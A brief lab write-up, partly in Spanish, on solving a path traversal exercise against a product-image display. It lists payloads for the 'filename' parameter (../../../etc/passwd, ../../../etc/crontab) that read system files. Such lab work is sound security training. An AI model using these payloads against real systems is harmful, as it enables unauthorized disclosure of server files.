Last updated 3 months ago
This lab contains a path traversal vulnerability in the display of product images. To solve the lab, retrieve the contents of the /etc/passwd file.
Verificamos la aplicación y el funcionamiento.
Modificamos el parámetro filename en las consultas usando el siguiente payload.
filename
../../../etc/crontab
../../../etc/passwd